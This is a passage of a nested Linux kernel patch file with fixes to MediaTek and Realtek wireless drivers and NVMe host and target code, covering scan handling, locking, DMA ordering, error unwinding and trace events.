+ 							multicast);
+ 		u32 val = MT_TXD6_FIXED_BW;
+diff --git a/drivers/net/wireless/mediatek/mt76/mt76_connac_mcu.c b/drivers/net/wireless/mediatek/mt76/mt76_connac_mcu.c
+index 025a237c1cce8..546cbe21aab31 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt76_connac_mcu.c
++++ b/drivers/net/wireless/mediatek/mt76/mt76_connac_mcu.c
+@@ -1561,8 +1561,16 @@ int mt76_connac_mcu_hw_scan(struct mt76_phy *phy, struct ieee80211_vif *vif,
+ 	req->channel_min_dwell_time = cpu_to_le16(duration);
+ 	req->channel_dwell_time = cpu_to_le16(duration);
+ 
+-	req->channels_num = min_t(u8, sreq->n_channels, 32);
+-	req->ext_channels_num = min_t(u8, ext_channels_num, 32);
++	if (sreq->n_channels == 0 || sreq->n_channels > 64) {
++		req->channel_type = 0;
++		req->channels_num = 0;
++		req->ext_channels_num = 0;
++	} else {
++		req->channel_type = 4;
++		req->channels_num = min_t(u8, sreq->n_channels, 32);
++		req->ext_channels_num = min_t(u8, ext_channels_num, 32);
++	}
++
+ 	for (i = 0; i < req->channels_num + req->ext_channels_num; i++) {
+ 		if (i >= 32)
+ 			chan = &req->ext_channels[i - 32];
+@@ -1582,7 +1590,6 @@ int mt76_connac_mcu_hw_scan(struct mt76_phy *phy, struct ieee80211_vif *vif,
+ 		}
+ 		chan->channel_num = scan_list[i]->hw_value;
+ 	}
+-	req->channel_type = sreq->n_channels ? 4 : 0;
+ 
+ 	if (sreq->ie_len > 0) {
+ 		memcpy(req->ies, sreq->ie, sreq->ie_len);
+diff --git a/drivers/net/wireless/mediatek/mt76/mt76x02_mac.c b/drivers/net/wireless/mediatek/mt76/mt76x02_mac.c
+index 93d96739f802c..48ef2a5992675 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt76x02_mac.c
++++ b/drivers/net/wireless/mediatek/mt76/mt76x02_mac.c
+@@ -631,8 +631,11 @@ void mt76x02_send_tx_status(struct mt76x02_dev *dev,
+ 
+ 	mt76_tx_status_unlock(mdev, &list);
+ 
+-	if (!status.skb)
++	if (!status.skb) {
++		spin_lock_bh(&dev->mt76.rx_lock);
+ 		ieee80211_tx_status_ext(mt76_hw(dev), &status);
++		spin_unlock_bh(&dev->mt76.rx_lock);
++	}
+ 
+ 	if (!len)
+ 		goto out;
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7915/soc.c b/drivers/net/wireless/mediatek/mt76/mt7915/soc.c
+index ee7ddda4288b8..20a6724ab5dba 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7915/soc.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7915/soc.c
+@@ -1228,6 +1228,8 @@ static const struct of_device_id mt7986_wmac_of_match[] = {
+ 	{},
+ };
+ 
++MODULE_DEVICE_TABLE(of, mt7986_wmac_of_match);
++
+ struct platform_driver mt7986_wmac_driver = {
+ 	.driver = {
+ 		.name = "mt7986-wmac",
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/dma.c b/drivers/net/wireless/mediatek/mt76/mt7921/dma.c
+index d1f10f6d9adc3..fd57c87a29ae3 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/dma.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/dma.c
+@@ -66,6 +66,24 @@ static void mt7921_dma_prefetch(struct mt7921_dev *dev)
+ 
+ static int mt7921_dma_disable(struct mt7921_dev *dev, bool force)
+ {
++	/* disable WFDMA0 */
++	mt76_clear(dev, MT_WFDMA0_GLO_CFG,
++		   MT_WFDMA0_GLO_CFG_TX_DMA_EN | MT_WFDMA0_GLO_CFG_RX_DMA_EN |
++		   MT_WFDMA0_GLO_CFG_CSR_DISP_BASE_PTR_CHAIN_EN |
++		   MT_WFDMA0_GLO_CFG_OMIT_TX_INFO |
++		   MT_WFDMA0_GLO_CFG_OMIT_RX_INFO |
++		   MT_WFDMA0_GLO_CFG_OMIT_RX_INFO_PFET2);
++
++	if (!mt76_poll_msec_tick(dev, MT_WFDMA0_GLO_CFG,
++				 MT_WFDMA0_GLO_CFG_TX_DMA_BUSY |
++				 MT_WFDMA0_GLO_CFG_RX_DMA_BUSY, 0, 100, 1))
++		return -ETIMEDOUT;
++
++	/* disable dmashdl */
++	mt76_clear(dev, MT_WFDMA0_GLO_CFG_EXT0,
++		   MT_WFDMA0_CSR_TX_DMASHDL_ENABLE);
++	mt76_set(dev, MT_DMASHDL_SW_CONTROL, MT_DMASHDL_DMASHDL_BYPASS);
++
+ 	if (force) {
+ 		/* reset */
+ 		mt76_clear(dev, MT_WFDMA0_RST,
+@@ -77,24 +95,6 @@ static int mt7921_dma_disable(struct mt7921_dev *dev, bool force)
+ 			 MT_WFDMA0_RST_LOGIC_RST);
+ 	}
+ 
+-	/* disable dmashdl */
+-	mt76_clear(dev, MT_WFDMA0_GLO_CFG_EXT0,
+-		   MT_WFDMA0_CSR_TX_DMASHDL_ENABLE);
+-	mt76_set(dev, MT_DMASHDL_SW_CONTROL, MT_DMASHDL_DMASHDL_BYPASS);
+-
+-	/* disable WFDMA0 */
+-	mt76_clear(dev, MT_WFDMA0_GLO_CFG,
+-		   MT_WFDMA0_GLO_CFG_TX_DMA_EN | MT_WFDMA0_GLO_CFG_RX_DMA_EN |
+-		   MT_WFDMA0_GLO_CFG_CSR_DISP_BASE_PTR_CHAIN_EN |
+-		   MT_WFDMA0_GLO_CFG_OMIT_TX_INFO |
+-		   MT_WFDMA0_GLO_CFG_OMIT_RX_INFO |
+-		   MT_WFDMA0_GLO_CFG_OMIT_RX_INFO_PFET2);
+-
+-	if (!mt76_poll(dev, MT_WFDMA0_GLO_CFG,
+-		       MT_WFDMA0_GLO_CFG_TX_DMA_BUSY |
+-		       MT_WFDMA0_GLO_CFG_RX_DMA_BUSY, 0, 1000))
+-		return -ETIMEDOUT;
+-
+ 	return 0;
+ }
+ 
+@@ -301,6 +301,10 @@ void mt7921_dma_cleanup(struct mt7921_dev *dev)
+ 		   MT_WFDMA0_GLO_CFG_OMIT_RX_INFO |
+ 		   MT_WFDMA0_GLO_CFG_OMIT_RX_INFO_PFET2);
+ 
++	mt76_poll_msec_tick(dev, MT_WFDMA0_GLO_CFG,
++			    MT_WFDMA0_GLO_CFG_TX_DMA_BUSY |
++			    MT_WFDMA0_GLO_CFG_RX_DMA_BUSY, 0, 100, 1);
++
+ 	/* reset */
+ 	mt76_clear(dev, MT_WFDMA0_RST,
+ 		   MT_WFDMA0_RST_DMASHDL_ALL_RST |
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/mcu.c b/drivers/net/wireless/mediatek/mt76/mt7921/mcu.c
+index 67bf92969a7b7..d3507e86e9cf5 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/mcu.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/mcu.c
+@@ -16,24 +16,6 @@ static bool mt7921_disable_clc;
+ module_param_named(disable_clc, mt7921_disable_clc, bool, 0644);
+ MODULE_PARM_DESC(disable_clc, "disable CLC support");
+ 
+-static int
+-mt7921_mcu_parse_eeprom(struct mt76_dev *dev, struct sk_buff *skb)
+-{
+-	struct mt7921_mcu_eeprom_info *res;
+-	u8 *buf;
+-
+-	if (!skb)
+-		return -EINVAL;
+-
+-	skb_pull(skb, sizeof(struct mt76_connac2_mcu_rxd));
+-
+-	res = (struct mt7921_mcu_eeprom_info *)skb->data;
+-	buf = dev->eeprom.data + le32_to_cpu(res->addr);
+-	memcpy(buf, res->data, 16);
+-
+-	return 0;
+-}
+-
+ int mt7921_mcu_parse_response(struct mt76_dev *mdev, int cmd,
+ 			      struct sk_buff *skb, int seq)
+ {
+@@ -60,8 +42,6 @@ int mt7921_mcu_parse_response(struct mt76_dev *mdev, int cmd,
+ 	} else if (cmd == MCU_EXT_CMD(THERMAL_CTRL)) {
+ 		skb_pull(skb, sizeof(*rxd) + 4);
+ 		ret = le32_to_cpu(*(__le32 *)skb->data);
+-	} else if (cmd == MCU_EXT_CMD(EFUSE_ACCESS)) {
+-		ret = mt7921_mcu_parse_eeprom(mdev, skb);
+ 	} else if (cmd == MCU_UNI_CMD(DEV_INFO_UPDATE) ||
+ 		   cmd == MCU_UNI_CMD(BSS_INFO_UPDATE) ||
+ 		   cmd == MCU_UNI_CMD(STA_REC_UPDATE) ||
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/pci.c b/drivers/net/wireless/mediatek/mt76/mt7921/pci.c
+index 8a53d8f286dbe..c64b0b4e93583 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/pci.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/pci.c
+@@ -111,9 +111,10 @@ static void mt7921e_unregister_device(struct mt7921_dev *dev)
+ 		napi_disable(&dev->mt76.napi[i]);
+ 	cancel_delayed_work_sync(&pm->ps_work);
+ 	cancel_work_sync(&pm->wake_work);
++	cancel_work_sync(&dev->reset_work);
+ 
+ 	mt7921_tx_token_put(dev);
+-	mt7921_mcu_drv_pmctrl(dev);
++	__mt7921_mcu_drv_pmctrl(dev);
+ 	mt7921_dma_cleanup(dev);
+ 	mt7921_wfsys_reset(dev);
+ 	skb_queue_purge(&dev->mt76.mcu.res_q);
+@@ -256,6 +257,7 @@ static int mt7921_pci_probe(struct pci_dev *pdev,
+ 	struct mt7921_dev *dev;
+ 	struct mt76_dev *mdev;
+ 	int ret;
++	u16 cmd;
+ 
+ 	ret = pcim_enable_device(pdev);
+ 	if (ret)
+@@ -265,6 +267,11 @@ static int mt7921_pci_probe(struct pci_dev *pdev,
+ 	if (ret)
+ 		return ret;
+ 
++	pci_read_config_word(pdev, PCI_COMMAND, &cmd);
++	if (!(cmd & PCI_COMMAND_MEMORY)) {
++		cmd |= PCI_COMMAND_MEMORY;
++		pci_write_config_word(pdev, PCI_COMMAND, cmd);
++	}
+ 	pci_set_master(pdev);
+ 
+ 	ret = pci_alloc_irq_vectors(pdev, 1, 1, PCI_IRQ_ALL_TYPES);
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/usb.c b/drivers/net/wireless/mediatek/mt76/mt7921/usb.c
+index 29c0ee330dbed..521bcd577640c 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/usb.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/usb.c
+@@ -252,7 +252,7 @@ static int mt7921u_probe(struct usb_interface *usb_intf,
+ 
+ 	ret = mt7921u_dma_init(dev, false);
+ 	if (ret)
+-		return ret;
++		goto error;
+ 
+ 	hw = mt76_hw(dev);
+ 	/* check hw sg support in order to enable AMSDU */
+diff --git a/drivers/net/wireless/mediatek/mt76/tx.c b/drivers/net/wireless/mediatek/mt76/tx.c
+index 6c054850363f6..4482e4ff78044 100644
+--- a/drivers/net/wireless/mediatek/mt76/tx.c
++++ b/drivers/net/wireless/mediatek/mt76/tx.c
+@@ -77,7 +77,9 @@ mt76_tx_status_unlock(struct mt76_dev *dev, struct sk_buff_head *list)
+ 		}
+ 
+ 		hw = mt76_tx_status_get_hw(dev, skb);
++		spin_lock_bh(&dev->rx_lock);
+ 		ieee80211_tx_status_ext(hw, &status);
++		spin_unlock_bh(&dev->rx_lock);
+ 	}
+ 	rcu_read_unlock();
+ }
+@@ -263,7 +265,9 @@ void __mt76_tx_complete_skb(struct mt76_dev *dev, u16 wcid_idx, struct sk_buff *
+ 	if (cb->pktid < MT_PACKET_ID_FIRST) {
+ 		hw = mt76_tx_status_get_hw(dev, skb);
+ 		status.sta = wcid_to_sta(wcid);
++		spin_lock_bh(&dev->rx_lock);
+ 		ieee80211_tx_status_ext(hw, &status);
++		spin_unlock_bh(&dev->rx_lock);
+ 		goto out;
+ 	}
+ 
+diff --git a/drivers/net/wireless/mediatek/mt76/util.c b/drivers/net/wireless/mediatek/mt76/util.c
+index 581964425468f..fc76c66ff1a5a 100644
+--- a/drivers/net/wireless/mediatek/mt76/util.c
++++ b/drivers/net/wireless/mediatek/mt76/util.c
+@@ -24,23 +24,23 @@ bool __mt76_poll(struct mt76_dev *dev, u32 offset, u32 mask, u32 val,
+ }
+ EXPORT_SYMBOL_GPL(__mt76_poll);
+ 
+-bool __mt76_poll_msec(struct mt76_dev *dev, u32 offset, u32 mask, u32 val,
+-		      int timeout)
++bool ____mt76_poll_msec(struct mt76_dev *dev, u32 offset, u32 mask, u32 val,
++			int timeout, int tick)
+ {
+ 	u32 cur;
+ 
+-	timeout /= 10;
++	timeout /= tick;
+ 	do {
+ 		cur = __mt76_rr(dev, offset) & mask;
+ 		if (cur == val)
+ 			return true;
+ 
+-		usleep_range(10000, 20000);
++		usleep_range(1000 * tick, 2000 * tick);
+ 	} while (timeout-- > 0);
+ 
+ 	return false;
+ }
+-EXPORT_SYMBOL_GPL(__mt76_poll_msec);
++EXPORT_SYMBOL_GPL(____mt76_poll_msec);
+ 
+ int mt76_wcid_alloc(u32 *mask, int size)
+ {
+diff --git a/drivers/net/wireless/ralink/rt2x00/rt2x00dev.c b/drivers/net/wireless/ralink/rt2x00/rt2x00dev.c
+index 3a035afcf7f99..9a9cfd0ce402d 100644
+--- a/drivers/net/wireless/ralink/rt2x00/rt2x00dev.c
++++ b/drivers/net/wireless/ralink/rt2x00/rt2x00dev.c
+@@ -1091,6 +1091,7 @@ static void rt2x00lib_remove_hw(struct rt2x00_dev *rt2x00dev)
+ 	}
+ 
+ 	kfree(rt2x00dev->spec.channels_info);
++	kfree(rt2x00dev->chan_survey);
+ }
+ 
+ static const struct ieee80211_tpt_blink rt2x00_tpt_blink[] = {
+diff --git a/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_8192e.c b/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_8192e.c
+index 46767dc6d6491..761aeec07cdd9 100644
+--- a/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_8192e.c
++++ b/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_8192e.c
+@@ -1700,6 +1700,7 @@ struct rtl8xxxu_fileops rtl8192eu_fops = {
+ 	.rx_desc_size = sizeof(struct rtl8xxxu_rxdesc24),
+ 	.has_s0s1 = 0,
+ 	.gen2_thermal_meter = 1,
++	.needs_full_init = 1,
+ 	.adda_1t_init = 0x0fc01616,
+ 	.adda_1t_path_on = 0x0fc01616,
+ 	.adda_2t_path_on_a = 0x0fc01616,
+diff --git a/drivers/net/wireless/realtek/rtlwifi/debug.c b/drivers/net/wireless/realtek/rtlwifi/debug.c
+index 0b1bc04cb6adb..9eb26dfe4ca92 100644
+--- a/drivers/net/wireless/realtek/rtlwifi/debug.c
++++ b/drivers/net/wireless/realtek/rtlwifi/debug.c
+@@ -278,8 +278,8 @@ static ssize_t rtl_debugfs_set_write_reg(struct file *filp,
+ 
+ 	tmp_len = (count > sizeof(tmp) - 1 ? sizeof(tmp) - 1 : count);
+ 
+-	if (!buffer || copy_from_user(tmp, buffer, tmp_len))
+-		return count;
++	if (copy_from_user(tmp, buffer, tmp_len))
++		return -EFAULT;
+ 
+ 	tmp[tmp_len] = '\0';
+ 
+@@ -287,7 +287,7 @@ static ssize_t rtl_debugfs_set_write_reg(struct file *filp,
+ 	num = sscanf(tmp, "%x %x %x", &addr, &val, &len);
+ 
+ 	if (num !=  3)
+-		return count;
++		return -EINVAL;
+ 
+ 	switch (len) {
+ 	case 1:
+@@ -375,8 +375,8 @@ static ssize_t rtl_debugfs_set_write_rfreg(struct file *filp,
+ 
+ 	tmp_len = (count > sizeof(tmp) - 1 ? sizeof(tmp) - 1 : count);
+ 
+-	if (!buffer || copy_from_user(tmp, buffer, tmp_len))
+-		return count;
++	if (copy_from_user(tmp, buffer, tmp_len))
++		return -EFAULT;
+ 
+ 	tmp[tmp_len] = '\0';
+ 
+@@ -386,7 +386,7 @@ static ssize_t rtl_debugfs_set_write_rfreg(struct file *filp,
+ 	if (num != 4) {
+ 		rtl_dbg(rtlpriv, COMP_ERR, DBG_DMESG,
+ 			"Format is <path> <addr> <mask> <data>\n");
+-		return count;
++		return -EINVAL;
+ 	}
+ 
+ 	rtl_set_rfreg(hw, path, addr, bitmask, data);
+diff --git a/drivers/net/wireless/realtek/rtw88/mac.c b/drivers/net/wireless/realtek/rtw88/mac.c
+index 2afe64f2abe69..589caeff2033a 100644
+--- a/drivers/net/wireless/realtek/rtw88/mac.c
++++ b/drivers/net/wireless/realtek/rtw88/mac.c
+@@ -233,7 +233,7 @@ static int rtw_pwr_seq_parser(struct rtw_dev *rtwdev,
+ 
+ 		ret = rtw_sub_pwr_seq_parser(rtwdev, intf_mask, cut_mask, cmd);
+ 		if (ret)
+-			return -EBUSY;
++			return ret;
+ 
+ 		idx++;
+ 	} while (1);
+@@ -247,6 +247,7 @@ static int rtw_mac_power_switch(struct rtw_dev *rtwdev, bool pwr_on)
+ 	const struct rtw_pwr_seq_cmd **pwr_seq;
+ 	u8 rpwm;
+ 	bool cur_pwr;
++	int ret;
+ 
+ 	if (rtw_chip_wcpu_11ac(rtwdev)) {
+ 		rpwm = rtw_read8(rtwdev, rtwdev->hci.rpwm_addr);
+@@ -270,8 +271,9 @@ static int rtw_mac_power_switch(struct rtw_dev *rtwdev, bool pwr_on)
+ 		return -EALREADY;
+ 
+ 	pwr_seq = pwr_on ? chip->pwr_on_seq : chip->pwr_off_seq;
+-	if (rtw_pwr_seq_parser(rtwdev, pwr_seq))
+-		return -EINVAL;
++	ret = rtw_pwr_seq_parser(rtwdev, pwr_seq);
++	if (ret)
++		return ret;
+ 
+ 	if (pwr_on)
+ 		set_bit(RTW_FLAG_POWERON, rtwdev->flags);
+diff --git a/drivers/net/wireless/realtek/rtw89/core.c b/drivers/net/wireless/realtek/rtw89/core.c
+index a703bb70b8f55..9e4a02a322ffe 100644
+--- a/drivers/net/wireless/realtek/rtw89/core.c
++++ b/drivers/net/wireless/realtek/rtw89/core.c
+@@ -3290,18 +3290,22 @@ static int rtw89_core_register_hw(struct rtw89_dev *rtwdev)
+ 	ret = ieee80211_register_hw(hw);
+ 	if (ret) {
+ 		rtw89_err(rtwdev, "failed to register hw\n");
+-		goto err;
++		goto err_free_supported_band;
+ 	}
+ 
+ 	ret = rtw89_regd_init(rtwdev, rtw89_regd_notifier);
+ 	if (ret) {
+ 		rtw89_err(rtwdev, "failed to init regd\n");
+-		goto err;
++		goto err_unregister_hw;
+ 	}
+ 
+ 	return 0;
+ 
+-err:
++err_unregister_hw:
++	ieee80211_unregister_hw(hw);
++err_free_supported_band:
++	rtw89_core_clr_supported_band(rtwdev);
++
+ 	return ret;
+ }
+ 
+diff --git a/drivers/net/wireless/realtek/rtw89/pci.c b/drivers/net/wireless/realtek/rtw89/pci.c
+index 5f8e19639362d..4a012962cd441 100644
+--- a/drivers/net/wireless/realtek/rtw89/pci.c
++++ b/drivers/net/wireless/realtek/rtw89/pci.c
+@@ -3828,25 +3828,26 @@ int rtw89_pci_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 	rtw89_pci_link_cfg(rtwdev);
+ 	rtw89_pci_l1ss_cfg(rtwdev);
+ 
+-	ret = rtw89_core_register(rtwdev);
+-	if (ret) {
+-		rtw89_err(rtwdev, "failed to register core\n");
+-		goto err_clear_resource;
+-	}
+-
+ 	rtw89_core_napi_init(rtwdev);
+ 
+ 	ret = rtw89_pci_request_irq(rtwdev, pdev);
+ 	if (ret) {
+ 		rtw89_err(rtwdev, "failed to request pci irq\n");
+-		goto err_unregister;
++		goto err_deinit_napi;
++	}
++
++	ret = rtw89_core_register(rtwdev);
++	if (ret) {
++		rtw89_err(rtwdev, "failed to register core\n");
++		goto err_free_irq;
+ 	}
+ 
+ 	return 0;
+ 
+-err_unregister:
++err_free_irq:
++	rtw89_pci_free_irq(rtwdev, pdev);
++err_deinit_napi:
+ 	rtw89_core_napi_deinit(rtwdev);
+-	rtw89_core_unregister(rtwdev);
+ err_clear_resource:
+ 	rtw89_pci_clear_resource(rtwdev, pdev);
+ err_declaim_pci:
+diff --git a/drivers/net/wwan/t7xx/Makefile b/drivers/net/wwan/t7xx/Makefile
+index dc6a7d682c159..5e6398b527e72 100644
+--- a/drivers/net/wwan/t7xx/Makefile
++++ b/drivers/net/wwan/t7xx/Makefile
+@@ -1,7 +1,5 @@
+ # SPDX-License-Identifier: GPL-2.0-only
+ 
+-ccflags-y += -Werror
+-
+ obj-${CONFIG_MTK_T7XX} := mtk_t7xx.o
+ mtk_t7xx-y:=	t7xx_pci.o \
+ 		t7xx_pcie_mac.o \
+diff --git a/drivers/nvme/host/core.c b/drivers/nvme/host/core.c
+index c54c6ffba0bcd..f502e032e7e46 100644
+--- a/drivers/nvme/host/core.c
++++ b/drivers/nvme/host/core.c
+@@ -4769,8 +4769,6 @@ static bool nvme_handle_aen_notice(struct nvme_ctrl *ctrl, u32 result)
+ 	u32 aer_notice_type = nvme_aer_subtype(result);
+ 	bool requeue = true;
+ 
+-	trace_nvme_async_event(ctrl, aer_notice_type);
+-
+ 	switch (aer_notice_type) {
+ 	case NVME_AER_NOTICE_NS_CHANGED:
+ 		set_bit(NVME_AER_NOTICE_NS_CHANGED, &ctrl->events);
+@@ -4806,7 +4804,6 @@ static bool nvme_handle_aen_notice(struct nvme_ctrl *ctrl, u32 result)
+ 
+ static void nvme_handle_aer_persistent_error(struct nvme_ctrl *ctrl)
+ {
+-	trace_nvme_async_event(ctrl, NVME_AER_ERROR);
+ 	dev_warn(ctrl->device, "resetting controller due to AER\n");
+ 	nvme_reset_ctrl(ctrl);
+ }
+@@ -4822,6 +4819,7 @@ void nvme_complete_async_event(struct nvme_ctrl *ctrl, __le16 status,
+ 	if (le16_to_cpu(status) >> 1 != NVME_SC_SUCCESS)
+ 		return;
+ 
++	trace_nvme_async_event(ctrl, result);
+ 	switch (aer_type) {
+ 	case NVME_AER_NOTICE:
+ 		requeue = nvme_handle_aen_notice(ctrl, result);
+@@ -4839,7 +4837,6 @@ void nvme_complete_async_event(struct nvme_ctrl *ctrl, __le16 status,
+ 	case NVME_AER_SMART:
+ 	case NVME_AER_CSS:
+ 	case NVME_AER_VS:
+-		trace_nvme_async_event(ctrl, aer_type);
+ 		ctrl->aen_result = result;
+ 		break;
+ 	default:
+diff --git a/drivers/nvme/host/trace.h b/drivers/nvme/host/trace.h
+index 6f0eaf6a15282..4fb5922ffdac5 100644
+--- a/drivers/nvme/host/trace.h
++++ b/drivers/nvme/host/trace.h
+@@ -127,15 +127,12 @@ TRACE_EVENT(nvme_async_event,
+ 	),
+ 	TP_printk("nvme%d: NVME_AEN=%#08x [%s]",
+ 		__entry->ctrl_id, __entry->result,
+-		__print_symbolic(__entry->result,
+-		aer_name(NVME_AER_NOTICE_NS_CHANGED),
+-		aer_name(NVME_AER_NOTICE_ANA),
+-		aer_name(NVME_AER_NOTICE_FW_ACT_STARTING),
+-		aer_name(NVME_AER_NOTICE_DISC_CHANGED),
+-		aer_name(NVME_AER_ERROR),
+-		aer_name(NVME_AER_SMART),
+-		aer_name(NVME_AER_CSS),
+-		aer_name(NVME_AER_VS))
++		__print_symbolic(__entry->result & 0x7,
++			aer_name(NVME_AER_ERROR),
++			aer_name(NVME_AER_SMART),
++			aer_name(NVME_AER_NOTICE),
++			aer_name(NVME_AER_CSS),
++			aer_name(NVME_AER_VS))
+ 	)
+ );
+ 
+diff --git a/drivers/nvme/target/admin-cmd.c b/drivers/nvme/target/admin-cmd.c
+index 76ceaadd6eeaf..31d35279b37a5 100644
+--- a/drivers/nvme/target/admin-cmd.c
++++ b/drivers/nvme/target/admin-cmd.c
+@@ -686,6 +686,13 @@ static bool nvmet_handle_identify_desclist(struct nvmet_req *req)
+ 	}
+ }
+ 
++static void nvmet_execute_identify_ctrl_nvm(struct nvmet_req *req)
++{
++	/* Not supported: return zeroes */
++	nvmet_req_complete(req,
++		   nvmet_zero_sgl(req, 0, sizeof(struct nvme_id_ctrl_nvm)));
++}
++
+ static void nvmet_execute_identify(struct nvmet_req *req)
+ {
+ 	if (!nvmet_check_transfer_len(req, NVME_IDENTIFY_DATA_SIZE))
+@@ -693,13 +700,8 @@ static void nvmet_execute_identify(struct nvmet_req *req)
+ 
+ 	switch (req->cmd->identify.cns) {
+ 	case NVME_ID_CNS_NS:
+-		switch (req->cmd->identify.csi) {
+-		case NVME_CSI_NVM:
+-			return nvmet_execute_identify_ns(req);
+-		default:
+-			break;
+-		}
+-		break;
++		nvmet_execute_identify_ns(req);
++		return;
+ 	case NVME_ID_CNS_CS_NS:
+ 		if (IS_ENABLED(CONFIG_BLK_DEV_ZONED)) {
+ 			switch (req->cmd->identify.csi) {
+@@ -711,29 +713,24 @@ static void nvmet_execute_identify(struct nvmet_req *req)
+ 		}
+ 		break;
+ 	case NVME_ID_CNS_CTRL:
+-		switch (req->cmd->identify.csi) {
+-		case NVME_CSI_NVM:
+-			return nvmet_execute_identify_ctrl(req);
+-		}
+-		break;
++		nvmet_execute_identify_ctrl(req);
++		return;
+ 	case NVME_ID_CNS_CS_CTRL:
+-		if (IS_ENABLED(CONFIG_BLK_DEV_ZONED)) {
+-			switch (req->cmd->identify.csi) {
+-			case NVME_CSI_ZNS:
+-				return nvmet_execute_identify_cns_cs_ctrl(req);
+-			default:
+-				break;
+-			}
+-		}
+-		break;
+-	case NVME_ID_CNS_NS_ACTIVE_LIST:
+ 		switch (req->cmd->identify.csi) {
+ 		case NVME_CSI_NVM:
+-			return nvmet_execute_identify_nslist(req);
+-		default:
++			nvmet_execute_identify_ctrl_nvm(req);
++			return;
++		case NVME_CSI_ZNS:
++			if (IS_ENABLED(CONFIG_BLK_DEV_ZONED)) {
++				nvmet_execute_identify_ctrl_zns(req);
++				return;
++			}
+ 			break;
+ 		}
+ 		break;
++	case NVME_ID_CNS_NS_ACTIVE_LIST:
++		nvmet_execute_identify_nslist(req);
++		return;
+ 	case NVME_ID_CNS_NS_DESC_LIST:
+ 		if (nvmet_handle_identify_desclist(req) == true)
+ 			return;
+diff --git a/drivers/nvme/target/fcloop.c b/drivers/nvme/target/fcloop.c
+index 5c16372f3b533..c780af36c1d4a 100644
+--- a/drivers/nvme/target/fcloop.c
++++ b/drivers/nvme/target/fcloop.c
+@@ -614,10 +614,11 @@ fcloop_fcp_recv_work(struct work_struct *work)
+ 	struct fcloop_fcpreq *tfcp_req =
+ 		container_of(work, struct fcloop_fcpreq, fcp_rcv_work);
+ 	struct nvmefc_fcp_req *fcpreq = tfcp_req->fcpreq;
++	unsigned long flags;
+ 	int ret = 0;
+ 	bool aborted = false;
+ 
+-	spin_lock_irq(&tfcp_req->reqlock);
++	spin_lock_irqsave(&tfcp_req->reqlock, flags);
+ 	switch (tfcp_req->inistate) {
+ 	case INI_IO_START:
+ 		tfcp_req->inistate = INI_IO_ACTIVE;
+@@ -626,11 +627,11 @@ fcloop_fcp_recv_work(struct work_struct *work)
+ 		aborted = true;
+ 		break;
+ 	default:
+-		spin_unlock_irq(&tfcp_req->reqlock);
++		spin_unlock_irqrestore(&tfcp_req->reqlock, flags);
+ 		WARN_ON(1);
+ 		return;
+ 	}
+-	spin_unlock_irq(&tfcp_req->reqlock);
++	spin_unlock_irqrestore(&tfcp_req->reqlock, flags);
+ 
+ 	if (unlikely(aborted))
+ 		ret = -ECANCELED;
+@@ -655,8 +656,9 @@ fcloop_fcp_abort_recv_work(struct work_struct *work)
+ 		container_of(work, struct fcloop_fcpreq, abort_rcv_work);
+ 	struct nvmefc_fcp_req *fcpreq;
+ 	bool completed = false;
++	unsigned long flags;
+ 
+-	spin_lock_irq(&tfcp_req->reqlock);
++	spin_lock_irqsave(&tfcp_req->reqlock, flags);
+ 	fcpreq = tfcp_req->fcpreq;
+ 	switch (tfcp_req->inistate) {
+ 	case INI_IO_ABORTED:
+@@ -665,11 +667,11 @@ fcloop_fcp_abort_recv_work(struct work_struct *work)
+ 		completed = true;
+ 		break;
+ 	default:
+-		spin_unlock_irq(&tfcp_req->reqlock);
++		spin_unlock_irqrestore(&tfcp_req->reqlock, flags);
+ 		WARN_ON(1);
+ 		return;
+ 	}
+-	spin_unlock_irq(&tfcp_req->reqlock);
++	spin_unlock_irqrestore(&tfcp_req->reqlock, flags);
+ 
+ 	if (unlikely(completed)) {
+ 		/* remove reference taken in original abort downcall */
+@@ -681,9 +683,9 @@ fcloop_fcp_abort_recv_work(struct work_struct *work)
+ 		nvmet_fc_rcv_fcp_abort(tfcp_req->tport->targetport,
+ 					&tfcp_req->tgt_fcp_req);
+ 
+-	spin_lock_irq(&tfcp_req->reqlock);
++	spin_lock_irqsave(&tfcp_req->reqlock, flags);
+ 	tfcp_req->fcpreq = NULL;
+-	spin_unlock_irq(&tfcp_req->reqlock);
++	spin_unlock_irqrestore(&tfcp_req->reqlock, flags);
+ 
+ 	fcloop_call_host_done(fcpreq, tfcp_req, -ECANCELED);
+ 	/* call_host_done releases reference for abort downcall */
+@@ -699,11 +701,12 @@ fcloop_tgt_fcprqst_done_work(struct work_struct *work)
+ 	struct fcloop_fcpreq *tfcp_req =
+ 		container_of(work, struct fcloop_fcpreq, tio_done_work);
+ 	struct nvmefc_fcp_req *fcpreq;
++	unsigned long flags;
+ 
+-	spin_lock_irq(&tfcp_req->reqlock);
++	spin_lock_irqsave(&tfcp_req->reqlock, flags);
+ 	fcpreq = tfcp_req->fcpreq;
+ 	tfcp_req->inistate = INI_IO_COMPLETED;
+-	spin_unlock_irq(&tfcp_req->reqlock);
++	spin_unlock_irqrestore(&tfcp_req->reqlock, flags);
+ 
+ 	fcloop_call_host_done(fcpreq, tfcp_req, tfcp_req->status);
+ }
+@@ -807,13 +810,14 @@ fcloop_fcp_op(struct nvmet_fc_target_port *tgtport,
+ 	u32 rsplen = 0, xfrlen = 0;
+ 	int fcp_err = 0, active, aborted;
+ 	u8 op = tgt_fcpreq->op;
++	unsigned long flags;
+ 
